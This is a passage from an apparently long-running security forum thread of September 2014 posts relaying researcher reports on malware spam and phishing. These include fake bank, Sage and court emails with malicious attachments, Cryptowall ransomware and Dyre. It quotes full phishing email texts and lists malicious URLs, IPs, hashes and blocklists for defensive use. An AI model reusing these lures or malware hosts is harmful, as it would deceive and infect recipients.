    We look forward to receiving payment for August, invoice as this is now due for payment.
    Regards,
    Clark ...


The attachment is Statement.zip which contains a malicious executable Statement.scr which has a reasonable VirusTotal detection rate of 18/55*. The Anubis report indicates that the binary phones home..."
* https://www.virustot...sis/1409736793/
___

Fake 'Important Documents' email SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
3 Sep 2014 - "'RE: Important Documents' pretending to come from Simon Leiman <Simon.Leiman@ rbs .com>  the name of sender at RBS appears to be random and can be any name is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... No attachment in the email but a link to a compromised website to download the malware:
RE: Important Documents
    [RBS Logo Image]
    Building tomorrow
    RE: Important Information
    We’re letting you know we have received a request from your bank to complete and sign the attached documents.
    To view/download the documents please click here.
    Please fill out the documents and fax them at +44 131 242 0017
    Simon Leiman
    Senior Accounting Manager
    Tel. +44 131 242 0017
    Email: Simon.Leiman@ rbs .com
    ? Royal Bank of Scotland 2014 ...


3 September 2014: AccountDocuments.zip ( 12kb) : Extracts to AccountDocuments.scr
Current Virus total detections: 4/54* . This 'RE: Important Documents' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...c0822/analysis/
___

iCloud hack/leak now being used as Social Engineering lure
- http://blog.trendmic...gineering-lure/
Sep 3, 2014 - "...  it was certainly only a matter of time before some enterprising cybercriminal decided that things were ripe for leveraging with socially-engineered threats. And that’s just what happened, as our scanning brought to our attention some freshly-concocted schemes targeting those looking for the photos borne from the aforementioned leak. The first threat we found hails from Twitter, in the form of a tweet being posted with hashtags that contain the name of one of the leak’s -victims- Jennifer Lawrence. The tweet spots a shortened link that, if -clicked- leads the user to a website offering a video of the actress in question...
Tweet with malicious link:
> http://blog.trendmic...wrencetweet.png
Website with offered video:
> http://blog.trendmic...encewebsite.png
If the user goes on to engage the playback, they are instead redirected to a download page for a ‘video converter’. The downloaded file is detected as ADW_BRANTALL:
> http://blog.trendmic...eoconverter.png
Besides this bait-and-switch maneuver, this particular threat also spread itself on Facebook by forcing users to share the malicious site on their profiles before they are given the ability to ‘play’ the offered video. This would result in the user’s wall being spammed with the link, as well as the download of another variant of ADW_BRANTALL. The spamming is shown below.
> http://blog.trendmic...acebookwall.png
Of course, in both cases, the user does not get to watch any video at all. And from our analysis, it appears that the majority of the users affected by this are from the United States (70%). We also discovered several malicious files floating around the internet that have been relabeled as zipped archives and/or video files of the leaked pictures in question. Again, we believe these files as part of a cybercriminal scheme to target those looking for the pictures themselves... With this incident in mind, it’s a good time to remind users that all popular news events – the iCloud leak being a prime example of it – will always have cybercriminals taking advantage of it in one way or another. If it’s something that you’ll use a search engine for, there’s a good chance that they’ve already created threats for it that will jump on you the moment you go looking. And do note that the threats we’ve talked about above are not the only ones lying around in wait! Always get your online news from trusted websites, and refrain from looking for/and downloading illegal material (such as leaked private photos or cracked software). Look into installing a security solution as well, if you haven’t done so already in these turbulent times.  A few fleeting moments of convenience or enjoyment is never worth the hassle."
___

'Infrastructure-configuration' adjustment
- http://www.reuters.c...N0GY2EQ20140903
Sep 3, 2014 - "Facebook Inc went down briefly for an unknown number of U.S. users on Wednesday afternoon in what appeared to be the latest outage to affect the world's largest social network. Several users had earlier reported getting an error message, "unable to connect to the Internet" when attempting to sign in. Facebook said the log-in problems arose after what it called an infrastructure-configuration adjustment..."
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 03 September 2014 - 09:09 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1271 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 04 September 2014 - 07:08 AM

FYI...

Fake sage .co.uk "Invoice_7104304" SPAM - PDF malware
- http://blog.dynamoo....04304-spam.html
4 Sep 2014 - "This -fake- invoice from Sage is actually a malicious PDF file:
    From:     Margarita.Crowe@ sage .co.uk [Margarita.Crowe@ sage .co.uk]
    Date:     23 July 2014 10:31
    Subject:     FW: Invoice_7104304
    Please see attached copy of the original invoice (Invoice_7104304).


Attached is a file sage_invoice_3074381_09042014.pdf which is -identical- to the payload for this Companies House spam* ..."
* http://blog.dynamoo....ual-return.html
4 Sep 2014 - "This -fake- Companies House spam comes with a malicious attachment.

Screenshot: https://4.bp.blogspo...ies-house-5.png

Attached is a malicious PDF file ar01_456746_09042014.pdf which has a VirusTotal detection rate of 5/54**. The Malware Tracker report shows that this attempts to exploit the CVE-2013-2729 flaw that was patched over a year ago.."
** https://www.virustot...58a2a/analysis/

- http://myonlinesecur...70-pdf-malware/
4 Sept 2014: sage_invoice_3074381_09042014.pdf - Current Virus total detections: 4/55***
*** https://www.virustot...sis/1409823534/
___

Fake 'Unauthorised iTunes Purchase' email - PHISH
- http://myonlinesecur...tunes-purchase/
4 Sep 2014 - "email received that says 'Unauthorised iTunes Purchase'. The interesting point about this one is the phishing URL. It is a pass through from a genuine Google URL https ://www.google .com/url?gc=PAH96di-ZUnHVlY&q=%68%74tp%3a%2f%2Fdl6.c1l%2eus%2FSb7ouez&sa=D&usg=AFQjCNEQ84I8qa2xYHVEKwXmJMrXG0_GhA which bounces via another url http ://dl6.c1l .us/Sb7ouez to end up on http ://111.90.144.179 /datacare/login/auth/dc347f94af30dff3ce1efd53f335d0e7/low_aa/
I had no idea that you could use google, especially a HTTPS (secure site) link to pass through to a phishing or any other site. Almost anybody seeing a google link will think that it is safe. Obviously this is a big security risk that Google servers allow this sort of divert or pass through and it needs to be plugged. The site asks for your Apple ID and password, then sends you to a page saying:
    My Apple ID
    It looks like someone used your data to make unverified purchase.
    We need to be sure that you’re real holder of this account and match the information you will provide us now with the information in our databases. Please make sure your information is correct before submitting it to us or it may cause further delays.
    Thank you.


Then wants you to fill in the form to give them your Name, address, Date of Birth, Credit card details, Mobile phone number etc. Everything they need to take over your identity in the virtual world as well as clear out all your bank and credit card accounts. It will then bounce you to the correct Apple page..."

111.90.144.179: https://www.virustot...79/information/
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 04 September 2014 - 10:32 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1272 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 05 September 2014 - 06:38 AM

FYI...

Phishing safety ...
- http://blog.trendmic...s-https-enough/
Sep 5, 2014 - "It was recently reported that Google would improve the search ranking of HTTPS sites in their search engine. This may encourage website owners to switch from HTTP to HTTPS. Cybercriminals are -also- taking part in this switch... we recently spotted a case where users searching for the -secure- version of a gaming site were instead led to a phishing site. We researched phishing sites that used HTTPS and were blocked by Trend Micro web reputation technology from 2010-2014. Based on our investigation, the number of phishing sites is increasing and we expect it to -double- towards the latter part of 2014...
Number of HTTPS phishing sites from 2010 to 2014:
> http://blog.trendmic...HTTPS_count.jpg
One of the reasons for this spike is that it is easy for cybercriminals to create websites that use HTTPS: they can either compromise sites that already use HTTPS, or use legitimate hosting sites or other services that already use HTTPS. There is no need for the cybercriminals to acquire their own SSL certificate, since they have just abused or compromised servers that -do- have valid certificates...
Screenshots of legitimate site (left) and phishing site (right):
> http://blog.trendmic...hishingsite.jpg
... While some sites have a green icon bar in the address bar as a security indicator, users still need to check the common name and organization. For example, users search for the Bank of America login page and click on the top result. In the login page, they can check for the green icon bar and the domain name, (which in this case is bankofamerica.com). When they click the green icon bar, a window will pop up. Users can then check for the “Issued to” which is equivalent to “Common Name.”  Note that the Common Name should be similar to the domain name...
Check the green icon bar and the domain name to determine if it is a legitimate site:
> http://blog.trendmic...reenbaricon.jpg
As more and more sites use SSL due to the boost in Google search rankings, users will have to become aware that the padlock of HTTPS is no longer a sign that they are visiting a safe site. They must first check the certificate before proceeding to give enter credentials and personal identifiable information (PII)... Based on feedback from the Smart Protection Network data, the top affected countries that visit HTTPS phishing sites are US and Brazil.
Top affected countries:
> http://blog.trendmic...ountries-01.jpg ..."
___

Hoax email comes with malicious Word doc
- http://blog.dynamoo....comes-with.html
5 Sep 2014 - "... Spanish-language spam email reports the (fake) death of Shakira in a car accident. Attached is a Word document that contains a malicious macro...  translates as:
Shakira dies in serious accident
    This morning at 1:10 A.M. in the neighborhood La Macarena, Colombia. The well-known singer and performer Shakira Isabel Mebarak Ripoll, suffered a serious car accident in which she lost herlife. Aboard the vehicle was her manager, who was seriously injured. Witnesses say the car driven by the latter, was speeding ..
    To view exclusive images and details of the story, we have attached a document with all the information about this tragic event.


When attempting to open the Word document (IMAGENES_01.doc), the potential victim sees the following:
Screenshot: https://4.bp.blogspo...600/shakira.png

The rest of the document explains to the victim how to remove the security settings from Word, supposedly to enable them to view the pictures. But what will actually happen is that the malicious macro in the document will try to infect the PC. This malicious document has a VirusTotal detection rate of just 2/54*. According to an analysis of the document, it then appears to download additional components from an insecure Joomla site at [donotclick]www .papeleriaelcid .com/aurora/ajax/ ... In this case the originating IP was 207.150.195.247 (a SouthWeb Ventures IP allocated to a customer supposedly called "Microinformatica Gerencial, S.A. de C.V."). Blocking the papeleriaelcid .com site and rejecting emails from 207.150.195.247 might be wise ..."
(English or other languages may be spammed out next.)
* https://www.virustot...sis/1409926479/
___

NatWest Phish: “You are Logging In from Different Cities”
- https://blog.malware...fferent-cities/
Sep 5, 2014 - "There’s a NatWest phish in circulation which tries to scare recipients with warnings of logins from multiple cities which it claims is forbidden. Anybody spending a lot of time on the road for work or personal reasons could potentially be panicked into clicking the links in this one. The URL in the mail leads to a 404 error on a website about different types of paint, so it’s likely been reported and / or pulled by the hosts but here’s the text so you can easily spot it the next time it gets rolled out with a fresh URL:

    Dear Customer,
    During a recent review of your account we found that you are currently logging in from different cities in a suspicious manner that is not compliant with our bank policies.
    NatWest customers are not permitted to log in from different places at same time, or using proxies.
    For your safety, we have temporarily deactivated your account, to reactive your account please go to our SSL secure link below and update your account credentials.
    However, please note that our squad reserves the right to close your account at any time. As such, we encourage you to become familiar with our program policies and monitor your network accordingly.


The email displays the full URL in the text of the legitimate NatWest website, but uses the old trick of making the clickable link take them to a -phish- hosted on a -compromised- website... it’s always a good idea to hover over any clickable link in an email so you can check the final destination... with so many people traveling as part of their job nowadays this could easily snag a few victims."
___

Cryptographic Locker
- http://www.webroot.c...graphic-locker/
Sep 5, 2014 - "... every few weeks we see a -new- encrypting ransomware variant. It’s not surprising either since the business model of ransoming files for money is tried and true. Whether it’s important work documents, treasured wedding pictures, or complete discographies of your favorite artists, everyone has valuable data they don’t want taken. This is the last thing anyone wants to see:
> https://www.webroot....und-cropped.png
This variant does bring some new features to the scene, but also fails at other lessons learnt by previous variants. Starting with the new features this variant will now just “delete” the files after encrypting them (it just hides them from you). This doesn’t add any more intangibility since they are encrypted with AES-128 anyway, but it does add a greater sense of loss and panic since all of your common data directories will appear to have been cleaned out. Another new feature is the constant raise in price every 24 hours. While price bumping was used on previous variants, this one doesn’t have a limit...  this variant falls short on overall volatility is in the failure to delete the VSS (Volume Shadow Service) so using tools like Shadow Explorer* will work to retrieve your files and circumvent paying the ransom. As I’ve said in previous blogs I do expect issues like this to be fixed once this malware is adopted by more botnets for widespread distribution..."
* http://www.shadowexplorer.com/
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 05 September 2014 - 02:16 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1273 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 08 September 2014 - 05:13 AM

FYI...

Fake BH Live Tickets SPAM - (bhlive .co.uk / bhlivetickets .co.uk)
- http://blog.dynamoo....r-pan-spam.html
8 Sep 2014 - "...  very large quantity of these spam emails, purporting to be from:
    From:     bhlivetickets@ bhlive .co.uk
    Date:     8 September 2014 08:43
    Subject:     Confirmation of Order Number 484914
    ORDER CONFIRMATION
    Order Number     Order Date
    484914     07-09-2014 13:00
    YOUR E-TICKET(S) ARE ATTACHED TO THIS EMAIL, SENT TO [redacted]. Please print ALL PAGES of the PDF file attached to the email and bring them with you to gain admission to the event...


These emails are -not- from BH Live Tickets and their systems have not been compromised in any way. Instead, these emails are a forgery with an attachment (tickets.3130599.zip or similar) which in turn contains a malicious executable (in this case tickets.332091.exe). The VirusTotal detection rate for this malware is just 3/55*. Comodo CAMAS reports** that this downloads an additional component from tiptrans .com .tr/333 which has a VirusTotal detection rate of 4/51***. According to ThreatExpert****, this second component POSTs some information to 80.94.160.129:8080 (OVH, France) and also appears to contact 92.222.46.165 (National Academy Of Sciences Of Belarus).
Recommended blocklist:
tiptrans .com .tr
92.222.46.165
80.94.160.129
"
* https://www.virustot...sis/1410162673/

** http://camas.comodo....c59aacda2c1bfe3

*** https://www.virustot...sis/1410163490/

**** http://www.threatexp...394a991645aec4b

- http://myonlinesecur...ke-pdf-malware/
8 Sep 2014
Screenshot: http://myonlinesecur...ve_ticketsd.png

> https://www.virustot...sis/1410164460/
___

Fake RBS "Important Docs" SPAM - again ...
- http://blog.dynamoo....-docs-spam.html
8 Sep 2014 - "The Royal Bank of Scotland has been spoofed several times recently, this latest fake spam contains a payload that looks like it might be Cryptowall.
Date:      Mon, 8 Sep 2014 15:00:22 +0100 [10:00:22 EDT]
From:      Vicente Mcneill [Vicente@rbs .co.uk]
Subject:      Important Docs
Please review attached documents regarding your account.
Tel:  01322 929655
Fax: 01322 499190
email: Vicente@ rbs .co.uk ...


Attached is an archive RBS_Account_Documents.zip containing a malicious executable RBS_Account_Documents.scr which has a detection rate at VirusTotal of 4/53*... analysis shows that it attempts to download components from the following locations:
95.141.37.158/0809uk1/NODE01/0/51-SP3/0/
95.141.37.158/0809uk1/NODE01/1/0/0/
95.141.37.158/0809uk1/NODE01/41/5/4/
bullethood.com/ProfilePics/0809uk1.zip
95.141.37.158 is SeFlow.it Internet Services, Italy. bullethood .com is on a shared server at GoDaddy. The malware also appears to be attempting to connect to 94.23.250.88 (OVH, France).
Recommended blocklist:
bullethood .com
95.141.37.158
94.23.250.88
"
* https://www.virustot...sis/1410183105/
___

Cryptowall ransomware ...
- http://arstechnica.c...-gameover-zeus/
Sept 7 2014 - "... Within a week of the takedown of Gameover Zeus and Cryptolocker, a surge of spam with links to a Cryptolocker copycat, known as Cryptowall, resulted in a jump in ransomware infections, states a report released last week by security-services firm Dell Secureworks*. Cryptowall first appeared in November 2013, and spread slowly, but the group behind the program were ready to take advantage of the vacuum left by the downfall of its predecessor. Being prepared paid off: In six months, the Cryptowall group infected nearly 625,000 systems, and even though only 0.27% of victims paid, the group still made $1.1 million, according to data from a command-and-control server discovered by Dell Secureworks..."
* http://www.securewor...all-ransomware/
___

‘Dyre’ malware goes after Salesforce users
- https://blog.malware...lesforce-users/
Sep 8, 2014 - "San Francisco-based company Salesforce well-known for its cloud-based Customer Relationship Management (CRM) software, emailed a security advisory to its customers, late Friday.
Copy of the email sent by Salesforce:
> https://blog.malware...force_email.png
The threat known as Dyre was originally spotted by security firm CSIS* and by PhishMe** which also had uncovered the new malware earlier in June. Back then, the threat was aimed at banks and other financial institutions, something very reminiscent of other banking Trojans such as Zeus and its variants. But researchers discovered that the malware is now capable of capturing login credentials from Salesforce users by -redirecting- them through a phishing website. Dyre will initially infect users through some form of social-engineering, typically with an email that contains a malicious attachment. Once on the system, the malware can act as a man-in-the-middle and intercept every single keystroke. To be clear, this is not a vulnerability with Salesforce or its website, but rather a type of malware that leverages compromised end-point machines... This type of attack could be mean there might be a new trend on the horizon, one that goes after Software as a Service (SaaS) users. Businesses increasingly rely on third-party software providers for their needs because it can be a cheaper option without all the headaches of doing it yourself. For example, instead of managing their own email server, companies will use Office365 or similar cloud-based email solutions. Banking credentials are still the bread-and-butter for the majority of cyber-crooks because they can be immediately used. But the data harvested from many SaaS applications also holds a tremendous value for those willing to invest the time to dig in and find bits of information that could lead to a large compromise in a top-tier business. There is no silver bullet to defend against these threats but once again a healthy balance of end-user education about phishing scams and proper end-point security solutions will go a long way. Data exfiltration is one the most important issues of 2014 with a growing number of businesses being affected. The effects on companies’ brands and trust of their customers can be very damaging and long lasting, not to mention the potential lawsuits that often follow.:
* https://www.csis.dk/en/csis/news/4262/

** http://phishme.com/p...s-bypasses-ssl/
___

Fake "PAYMENT SLIP" SPAM - with an encrypted .7z archive
- http://blog.dynamoo....-encrypted.html
8 Sep 2014 - "This spam comes with a malicious attachment:
    From:     daniel mo [danielweiche002@ gmail .com]
    Subject:     PAYMENT SLIP
    Signed by:     gmail .com
    Thanks for your last message,
    We remitted 30% prepayment today amounting to 51,300USD against your invoice INV332831 as was agreed with you by our purchasing agent. Please check the attached invoice and the payment slip and correspond your account information. You will receive payment in your account after a few days.
    Please confirm the receipt  below,
    kindly use this password {121212} to view attachment for our payment slip;
    Thanks,
    Daniel
    Accounts Assistant
    67752222
    64472801
    Zenia Singapore Pte Ltd


In order to deal with the attachment new order.7z, you'll need something capable of dealing with .7z files (e.g. 7-Zip). Inside the archive is a malicious executable new order.scr which has a VirusTotal detection rate of 5/54*. I have not been able to analyse the malware any further than this."
* https://www.virustot...sis/1410186462/
___

RBC Royal Bank Phish - and PDF malware
- http://myonlinesecur...rvice-phishing/
8 Sep 2014 - "'You have received a new secure message from RBC Royal Bank Customer Service' pretending to come from RBC Royal Bank Customer Service <securemessage@ rbc .com> is an attempt to -scam- you and get your bank log on details. It also is trying to infect you and is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email is particularly devious, evil  and crafty as it sends you to a site that at first glance you think is a phishing site ( if you are unwise enough to click any of the links in the email ). However that site also has a hidden iframe that tries to download some malware to the computer if you have a vulnerable version of Java. Then if that isn’t enough when you fill in the log in details on the page the buttons on the page appear to link to the genuine RBC bank site so hovering over the links will fool you into thinking that you are on the genuine RBC site:
> http://myonlinesecur...2014/09/rbc.png
... then the sign in button leads you to this webpage where any of the links or the buttons download what appears to be a genuine PDF file that looks blank. That file is a malformed PDF with a script virus embedded that will infect you. This file 09.08.14report.pdf has a current VirusTotal detection rate of 5/55*. These emails contain a genuine PDF file that is malformed  and contains a script virus and can infect you with no action on your part by simply previewing the PDF in your browser or in the PDF reader..."
* https://www.virustot...sis/1410199439/

- http://threattrack.t.../rbc-royal-bank
Sep 8, 2014 - "Subjects Seen:
    You have received a new secure message from RBC Royal Bank Customer Service
Typical e-mail details:
    You have received a secure message
    This is an automated message sent by Royal Bank Secure Messaging Server.
    The link above will only be active until: 09/10/2014
    Please click here or follow this link : royalbank.com/cgi-bin/rbaccess/rbcgi3m01
    Help is available 24 hours a day by email at secure.emailhelp @rbcroyalbank.com
    If you have concerns about the validity of this message, please contact the sender directly. For questions about Royal Bank’s e-mail encryption service, please contact technical support at 1-800-769-2511.
    First time users - will need to register before reading the Secure Message.


Malicious URLs:
    halilbekrek .com/TUTOS/libs/excel/install6.exe
    66.235.98.169/rbc.com/webapp/ukv0/signin/logon.php
    66.235.98.169/rbc.com/webapp/ukv0/signin/report/09.08.14report.pdf
    84.45.53.45/rbc.com/webapp/ukv0/signin/logon.php
    84.45.53.45/rbc.com/webapp/ukv0/signin/message.html
    84.45.53.45/rbc.com/webapp/ukv0/signin/report/09.08.14report.pdf

Malicious File Name and MD5:
    install6.exe (e3fbc7b3bf11f09c5ee33b1e1b45f81b)
    09.08.14report.pdf (ecddafa699814679552d2bf95fc087e5)
    OfigGigg.dat (85d42ccc12301bbda27abf4c0b7eb7ff)


66.235.98.169: https://www.virustot...69/information/

84.45.53.45: https://www.virustot...45/information/

Tagged: RBC, Vawtrak, CVE-2013-2729
___

Fake Tcn Invoice SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
8 Sep 2014 - "'Tcn Invoice # N265588248042E' pretending to come from  Katharine Norwood <Katharine.Norwood@ advanced-ornamentation .com>  is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
    Good morning...
    I requested an invoice yesterday; on the invoice it shows a charge of $585.15 although on my credit card statement it shows a charge of $185.13. Can you please advise on what the total should be and if it is for the amount of $185.13 can you please provide an invoice with that amount.
    Thank you.
    Katharine Norwood
    Administrative Assistant
    San Diego, CA 92135
    205 840-2913


8 September 2014: Invoice.zip ( 48 kb) : Extracts to Invoice.pdf.scr
Current Virus total detections: 4/55*. This 'Tcn Invoice # N265588248042E' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410198304/
___

Twitter Phish SPAM: “Strange Rumors About You”
- https://blog.malware...mors-about-you/
Sep 8, 2014 - "... an ongoing Twitter spam attack which is sending potential victims to phishing pages via a Tumblr -redirect- . Compromised Twitter accounts and / or bots are sending variations of the below to Twitter users:
> https://blog.malware...witterspam1.jpg
We’ve seen some 200+ messages sent in the last ten minutes, and this attack has been ongoing for at least six hours. Here’s the Tumblr -spam- blog which is redirecting to the fake Twitter login, and the -fake- login itself:
> https://blog.malware...witterspam2.jpg
...
> https://blog.malware...witterspam3.jpg
The -fake- page reads:
    “Your current session has ended.
    For security purposes your [sic] were forcibly signed out. You need to verify your Twitter account, please relogin.”

Twitter users should -avoid- signing into Twitter via any of the links being sent around, and always check the URL to ensure they’re entering their credentials in the right place."

211.154.136.106: https://www.virustot...06/information/
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 08 September 2014 - 07:05 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1274 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 09 September 2014 - 07:40 AM

FYI...

Fake Bill.com Invoice SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
9 Sep 2014 - "'Bill.com Invoice has been paid' pretending to come from The Bill .com Team <notificationonly@ hq.bill .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
[ Bill .com image ]
Hi,
Thank you for payment to Bill.com. The credit/debit card you have on file with us was successfully charged $115.33 for the billing period 08/01/14-09/01/14.
The Statement for this account is now available for viewing. Please find it attached to this email.
Have questions? Sign in at our website, then contact support.
Thank you,
The Bill .com Team
Please do not respond to this email. This e-mail was sent from a notification-only e-mail address.


9 September 2014: bill-d59f78596bfa79e01898cf9d0e645b99328028d597e9005146787f09435a01016270d6ffc5d69ec27901.zip ( 486 kb):
Extracts to BILL_ID_895634523945258345873645763459879876432985763298563253245.pdf.exe     Current Virus total detections: 28/55*. This Bill .com Invoice has been paid is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410252379/
____

“Google dorking“ ...
- http://blog.trendmic...ins-everywhere/
Sep 9, 2014 - "Last July, the US Department of Homeland Security warned of a new kind of criminal attack: “Google dorking“*. This refers to asking Google for things they have found via special search operators... Google finds things online using a program that accesses web sites: the Google web crawler, called the Googlebot. When the Googlebot examines the web and finds “secret” data, it adds it to Google’s database just like any other kind of information... suppose your company’s HR representative left a spreadsheet with -confidential- employee data -online- . Since it’s open for everyone to access, the crawler sees and indexes it. From them on, even though it might have been hard to find before, a simple – or not so simple – Google search will point any attacker to it. Google never stored the actual data (unless it was cached), it just made it easier to find. This kind of “attack” has been around for as long as search engines have been around. There are whole books devoted to the subject of “Google dorking”, which is more commonly known as “Google hacking”.  Books have been published about it for years, and even the NSA has a 643-page manual that describes in detail how to use Google’s search operators to find information. The warning – as ridiculous as it might seem – has some merit... finding information that has been carelessly left out in the open is not strictly criminal: at the end of the day, it was out there for Googlebot to find. Google can’t be blamed for finding what has been left public; it’s the job of web admins to know what is and isn’t on their servers wide open for the world to see. It’s not just confidential documents that are open to the public, either. As we noted as far back in 2013, industrial control systems could be found via Google searches. Even more worryingly, embedded web servers (such as those used in web cameras) are found online all the time with the Shodan search engine. This latter threat was first documented in 2011, which means that IT administrators have had three years to shut down these servers, but it’s still a problem to this day. In short: this problem has been around for a while, but given that it’s still around an official warning from the DHS is a useful reminder to web admins everywhere: perform “Google dorking” against your own servers frequently, looking for things that shouldn’t be there. If you don’t, somebody else will and their intentions might not be so pure..."
* https://publicintell...google-dorking/
___

Fake Sage Outdated Invoice SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
9 Sep 2014 - "'Outdated Invoice' pretending to come from Sage Account & Payroll <invoice@ sage .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
[Sage logo image ]
Sage Account & Payroll
You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link bellow or click here to view/download your account invoice:
... Account?432532=Invoice_090914.zip
If we hold any information about you which is incorrect or if there are any changes to your details please let us know by so that we can keep our records accurate and up to date. If you would like to update your records or see a copy of the information that we hold about you, you can contact us at Data Protection Officer, Sage (UK) Ltd, North Park, Newcastle-upon-Tyne, NE13 9AA or by email to digital@sage.com. If you request a copy of your information you will need to pay a statutory fee which is currently £10.
The contents of this email and any attachments are confidential...


9 September 2014: invoice_090914.zip ( 18kb) : Extracts to invoice_090914.scr
Current Virus total detections: 4/55* . This 'Outdated Invoice' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410267601/

- http://blog.dynamoo....voice-spam.html
9 Sep 2014
"Recommended blocklist:
95.141.37.158 ..."
(More detail at the dynamoo URL above.)

95.141.37.158: https://www.virustot...58/information/
___

Fake NatWest Invoice SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
9 Sep 2014 - "'Important – New account invoice' pretending to come from NatWest Invoice <invoice@ natwest .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
[NatWest logo image]
Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
To view/download your invoice please click here or follow the link below...


9 September 2014: invoice_090914.zip ( 18kb) : Extracts to invoice_090914.scr
Current Virus total detections: 4/55* . This 'Important – New account invoice' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410267601/
___

Fake Worker’s Compensation SPAM – word.doc malware
- http://myonlinesecur...rd-doc-malware/
9 Sep 2014 - "'HMC&TS Worker’s Compensation Appeal' pretending to come from HM Courts and Tribunals Service <submit.wjq@ courtsni .gov.uk>is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... So far today I have seen several subjects for this email:
    HMC&TS Worker’s Compensation Appeal
    Worker’s Compensation Summons
    HM Courts & Tribunals Service Summons
    HM Courts & Tribunals Service
All the emails are very similar, but will have different courts or tribunals listed and different dates, case numbers and tribunal members. The faked sender will always be the same name as the recipient of the email with a few random letters after the name... Email reads:
Worker’s Compensation Appeal Tribunal
Decision # 502
Board Direction To Rehear Decision #695
Claim No.: 2504=5704
Date of Original Notice of Appeal: June 10, 2014
Date Received at The Tribunal: June 19, 2014
Date of Board Direction to Rehear: August 11, 2014
Received: August 20, 2014
Date of Documentary Review by Appeal Committee: August 23, 2014
Date of Decision: September 6, 2014
     To Whom It May Concern,
     Your Corporation (named Respondent)
Appears to be in default because of its failure to comply with the Administrative Law Judge’s Prehearing Order without decent cause, and such default by Respondent constitutes an admission of all facts alleged in the Complaint and a waiver of Respondent’s right to contest such factual allegations. Respondent violated the section 9(6), paragraph B13(1) of the Jobseekers Act 1995.
We recommend you to download a copy of original Complaint at Tribunal in attachment below...


9 September 2014: Copy68789.zip (66kb): Extracts to Copy of original Complaint at Tribunal.docx.exe
Current Virus total detections: 1/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft word .doc instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410269102/

- http://threattrack.t...ls-service-spam
Sep 9, 2014
Screenshot: https://gs1.wac.edge...LcAX1r6pupn.png

Malicious File Name and MD5:
    Copy4855.zip (854ADF297E8B1D79BA0E744F90AFDE50)
    Copy of original Complaint at Tribunal.docx.exe (6D9BDE90B81C064ACA5ED994BC8A981A)


Tagged: HM Courts & Tribunals, Kuluoz
___

Hacks throw 25 malware variants at Apple Mac OS X
- http://www.theinquir...-apple-mac-os-x
Sep 9 2014 - "... 25 varieties of malware, some of which are being used in targeted attacks, warns security firm F-Secure. F-Secure reported uncovering the malware variants in its Threat Report H1 2014*, claiming it discovered the first 20 attack tools earlier this year..."
* http://www.f-secure....s/00002741.html
Sep 8, 2014
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 09 September 2014 - 01:34 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1275 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 10 September 2014 - 06:15 AM

FYI...

Fake DHL invoice SPAM
